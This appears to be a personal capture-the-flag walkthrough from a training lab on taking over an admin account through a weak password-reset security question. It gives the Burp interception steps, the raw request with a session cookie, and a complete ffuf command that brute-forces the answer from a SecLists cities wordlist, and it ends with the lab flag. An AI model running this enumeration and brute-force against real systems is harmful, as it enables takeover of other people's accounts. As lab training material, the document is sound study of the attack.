PASSWORD RESET: SECURITY QUESTIONS
#identify valid webapp users (username enumeration)
#first check whether the login page itself leaks account existence: submit a guessed username with a wrong password and compare the error text against the one returned for a clearly non-existent username. if the two messages (and response length/timing) are identical, the login form is not an enumeration oracle and the password-reset flow below is used instead
root@oco:~$ BROWSER > {targetSite:port}
username: admin
password: invalid
* username=admin&password=invalid
* error: "Invalid username or password." (generic for both unknown user and wrong password, so login does not confirm that "admin" exists)
- the error msg is case sensitive and MUST be specified exactly as shown when using ffuf, hydra, etc; copy it from the raw HTTP response in Burp rather than the rendered page, since HTML entities, tags, or surrounding whitespace can differ from what the browser displays
#intercept request & response error msg for use with ffuf
root@oco:~$ burpsuite
root@oco:~$ BROWSER > FoxyProxy > Burp
root@oco:~$ BURP SUITE > Proxy > Intercept is on
root@oco:~$ BROWSER > {targetSite:port} > Reset your password
username field: admin
* submit the expected user input; the reset page accepting "admin" and moving on to a security question is the confirmation that the account exists
#identify the session cookie, the target page, and the error msg
BURP > Proxy
Request
...
POST /security_question.php HTTP/1.1
Host: 94.237.57.27:54385
Origin: http://94.237.57.27:54385
Content-Type: application/x-www-form-urlencoded
Referer: http://94.237.57.27:54385/security_question.php
Cookie: PHPSESSID=e442r8fnnre805ctkfl9d0cm0e
Connection: close
security_response=test
* "Incorrect response." is the body text returned for a wrong answer; it is the string to filter out with ffuf
* the PHPSESSID cookie is required: the username entered on the reset page appears to be tracked server-side per session, so requests without it (or with an expired one) are presumably not evaluated against the admin account. re-capture the cookie if the lab instance restarts or the session times out
#generate security question wordlist
root@oco:~$ locate *citi*
/usr/share/seclists/Miscellaneous/security-question-answers/cities.txt
/usr/share/seclists/Miscellaneous/us-cities.txt
root@oco:~$ cp /usr/share/seclists/Miscellaneous/security-question-answers/cities.txt .
root@oco:~$ cat cities.txt
root@oco:~$ wc -l cities.txt
#craft the ffuf cmds (replace host:port and the PHPSESSID value with the ones from your own Burp capture)
root@oco:~$ ffuf -w cities.txt -u http://94.237.57.27:54385/security_question.php -X POST -H "Content-Type: application/x-www-form-urlencoded" -b "PHPSESSID=e442r8fnnre805ctkfl9d0cm0e" -d "security_response=FUZZ" -fr "Incorrect response\."
- -fr drops every response whose body matches the regex (the "." is escaped so it matches a literal period); whatever is left is the candidate answer, which must be confirmed manually in the browser
- this sends one request per wordlist entry; only run it against targets you are authorized to test, and add -p/-t to throttle if the app might lock the account or rate-limit the session
* the wordlist entry is lowercase ("manchester") and that is what ffuf matched and what the academy question expects; when completing the reset in the browser the app wanted "Manchester", so submit the exact form the app accepts and try both cases if one is rejected
#reset the password: submit the recovered answer on security_question.php, set a new password of your choosing, then log in with it
root@oco:~$ BROWSER > http://94.237.57.27:54385/index.php
username: admin
password: {the new password you set during the reset}
* HTB{d4740b1801d9880ff70de227a54309f0}